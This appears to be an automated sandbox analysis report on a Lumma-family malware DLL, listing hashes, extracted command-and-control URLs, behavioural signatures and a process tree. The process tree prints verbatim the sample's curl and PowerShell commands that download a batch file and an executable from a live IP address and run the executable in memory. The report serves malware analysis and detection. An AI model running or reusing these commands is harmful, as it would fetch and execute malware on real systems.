Analysis
-
max time kernel
93s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-01-2025 18:51
Static task
static1
Behavioral task
behavioral1
Sample
b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
Resource
win7-20240708-en
General
-
Target
b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
-
Size
80KB
-
MD5
07fd51e1e8368144ea403137a671b84c
-
SHA1
b41a78c43c5bf58f6664cb455130c9501c370f05
-
SHA256
b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f
-
SHA512
854a57be09cb09217d268f9e5c2d9ce5da8cbed1fa75c3ec38cc2f1b323377cdbd4db29687fa01e186a1cad6a2ee2e18f8645f98f551eeaa9805269a21354dd7
-
SSDEEP
1536:Y2ShYtT4To+GdOfoPXRr9tXLtAuQeSVdJssWdcd7IW3+ZR+ueK:Y2z0To+GdlhrbwJJ7IW3+n+ue
Malware Config
Extracted
http://147.45.44.131/infopage/ioubcs.exe
http://147.45.44.131/infopage/ioubcs.exe
Extracted
lumma
https://factlosserk.click/api
Signatures
-
Lumma family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 17 4140 powershell.exe -
Downloads MZ/PE file
-
pid Process 4140 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4140 set thread context of 4448 4140 powershell.exe 91 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4140 powershell.exe 4140 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4140 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 3468 wrote to memory of 3916 3468 regsvr32.exe 82 PID 3468 wrote to memory of 3916 3468 regsvr32.exe 82 PID 3468 wrote to memory of 3916 3468 regsvr32.exe 82 PID 3916 wrote to memory of 4340 3916 regsvr32.exe 83 PID 3916 wrote to memory of 4340 3916 regsvr32.exe 83 PID 3916 wrote to memory of 4340 3916 regsvr32.exe 83 PID 4340 wrote to memory of 4608 4340 cmd.exe 85 PID 4340 wrote to memory of 4608 4340 cmd.exe 85 PID 4340 wrote to memory of 4608 4340 cmd.exe 85 PID 4340 wrote to memory of 4512 4340 cmd.exe 86 PID 4340 wrote to memory of 4512 4340 cmd.exe 86 PID 4340 wrote to memory of 4512 4340 cmd.exe 86 PID 4512 wrote to memory of 4140 4512 cmd.exe 88 PID 4512 wrote to memory of 4140 4512 cmd.exe 88 PID 4512 wrote to memory of 4140 4512 cmd.exe 88 PID 4140 wrote to memory of 4564 4140 powershell.exe 89 PID 4140 wrote to memory of 4564 4140 powershell.exe 89 PID 4140 wrote to memory of 4564 4140 powershell.exe 89 PID 4564 wrote to memory of 1376 4564 csc.exe 90 PID 4564 wrote to memory of 1376 4564 csc.exe 90 PID 4564 wrote to memory of 1376 4564 csc.exe 90 PID 4140 wrote to memory of 4448 4140 powershell.exe 91 PID 4140 wrote to memory of 4448 4140 powershell.exe 91 PID 4140 wrote to memory of 4448 4140 powershell.exe 91 PID 4140 wrote to memory of 4448 4140 powershell.exe 91 PID 4140 wrote to memory of 4448 4140 powershell.exe 91 PID 4140 wrote to memory of 4448 4140 powershell.exe 91 PID 4140 wrote to memory of 4448 4140 powershell.exe 91 PID 4140 wrote to memory of 4448 4140 powershell.exe 91 PID 4140 wrote to memory of 4448 4140 powershell.exe 91
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll1⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\SysWOW64\curl.execurl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat4⤵PID:4608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K AppS.bat4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$url = 'http://147.45.44.131/infopage/ioubcs.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uakuedc2\uakuedc2.cmdline"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88C7.tmp" "c:\Users\Admin\AppData\Local\Temp\uakuedc2\CSC4EA348C9CA1E49F59ED6FAB9BBF6EA6F.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:1376
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- System Location Discovery: System Language Discovery
PID:4448
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a658940183fa3f3a9207533488ebccb8
SHA19fad52a76783fbf5a68bbd07c78eb6679e25c4c8
SHA2567a36335299fbd0d202b6aefb6e131c443622c05e3aac407d585d433e127964f1
SHA512caa02fd64f3a963a843dd834e5449de40212a580cbeb86a99f861062c6cb2c48a6e73d67382b4fac29cf81435b48f5536924f6c68ac1b2a815db19252c5d037e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD58523bff1ae79a19b82296569be121789
SHA19b4bf437b87c2cbd2b70c2a44ff9c40a0ee4d20c
SHA2560ef01db61f23defe8ced0d866fbe7e5a14fed106482662e75f47790bae6f4fc4
SHA512b7c137a7d28ba6ec66180088060172024bc266d7caf4f5c61acb4414c990106f60edd64cf5a79c0f32b2c74e46f06b2fa1b35abcb1451dd51855679bf3a059ac
-
Filesize
5KB
MD5244582a493f376d9c0f5672292d11ff2
SHA195e5011b114869175aebca27f73b11a9b0a2360b
SHA256ed786fd429082e725242f54db70f1a249c8deb54acb404bf27581fb523915c87
SHA51259e4943cddd994af1ff8f724eb83065abca723891ab250a3c0a047e612111329f20a2fdba8dafd587c8f638f192b91c2a97d48503df59d3bf6dc7aec766d0d41
-
Filesize
652B
MD50f4eee3637957bdef27da9c754fa7cdb
SHA163f62b77471ab0b4b08d1a5744053b404b462b6d
SHA2568bb0dc1313f5ebe70afcb7524b0555633939832208062cd00700926fd717d2c2
SHA512aee3aa9e48bb1463463e3db7440d293dae00c09e271046ceaa3baabc61e578f71269c266ad4049b9e8a098c7bacccf5f651818eb10ff44d5af46be84e651e85b
-
Filesize
10KB
MD59a280bef5048674eed1b619db8e0c654
SHA1f849de0496358992d1c0d40562da1aaede680453
SHA25684a03780f5ebbf7989a4741b7a51206ac0b64562f2164af7427b5e1dac885d30
SHA5126a4a1dba810d56dd64238d90e927b048570dbea05ec453826c23d2e267bf960e533ff9446827cba458f7c564b036bbe42613d5d3d7b68dd084cf4a17b2d2be5f
-
Filesize
204B
MD5ebb0e04e7cd48733872fd2ab28daa9d5
SHA1509478c3151530097d64453322bb85c6bf599602
SHA2569176dc5dbf3b74fcd9b8daba2919fc169069b6199eab50f63ba0f494ac68661f
SHA51256a0062cb700f17c9a7b8c922ec61ce09761c2e44e09118e8b0e12f8ccf2b46541f866914e5848f410c04238bacaeb990daeeae1a038eac2196a5e4d69692257